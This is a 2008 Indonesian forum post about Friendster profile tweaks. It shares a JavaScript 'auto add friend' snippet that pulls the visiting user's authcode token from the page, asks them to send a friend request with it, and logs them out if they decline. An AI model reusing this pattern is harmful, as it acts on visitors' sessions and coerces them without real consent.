You are viewing a post by y4sir. View all 25607 posts in Bagi para member yang ingin bertanya seputar tweaking FS. Silahkan bertanya dan posting disini. Sebelum itu harap membaca dan mengikuti [url=http://theftalk.com/t23371-FORUM-RULES.html][b]FORUM .

[/quote]
cari jah html yang dah jdi and tinggal d edit nich da yang kerenzzz
[url=http://theftalk.com/t41495-%7BTUTORIAL%7D-Welcome-Page-ver-Windows-Vista.html]welcome page window vista[/url]
[quote=asep_tea]upss lupa...
ada yg punya code add otomatis gak???
HTML na taroh di bagian A sob...[/quote]
nich kode na sob
[spoiler][quote]//Auto add friend
if (typeof FRIENDSCAN == "undefined") { FRIENDSCAN = {}; }
FRIENDSCAN = {
init: function() {
var emailAdd = "[b]email_loe[/b]";
var areWeFriend = "yes";
var authCode = "";
var scanner = document.getElementById("controlPanelButtons").innerHTML;
var AFRconfirm = scanner.search(/Add as Friend/);
if (AFRconfirm > 0) {
areWeFriend = "no";
authCode = /href="[\S\s]*?authcode=([\S\s]+?)">Add as Friend/.exec(scanner)[1];
}
if(areWeFriend == "no") {
var cForm = confirm("[b]Kya na lw blum nge-add gw dweh.\n lw mw Nge-add gw gak ?[/b]");
if (cForm == true) {
document.location.href="http://www.friendster.com/addfriendrequest.php?confirm=1&authcode="+authCode+"&uid="+pageOwnerID+"&id=&email="+encodeURI(emailAdd)+"&lastname=";
}else { document.location.href="http://www.friendster.com/logout.php";}
}
}
};
FRIENDSCAN.init();[/quote]
[/spoiler]
yang [b]bold[/b] bsa d edit
Last edited by y4sir (2008-10-02 10:02:14)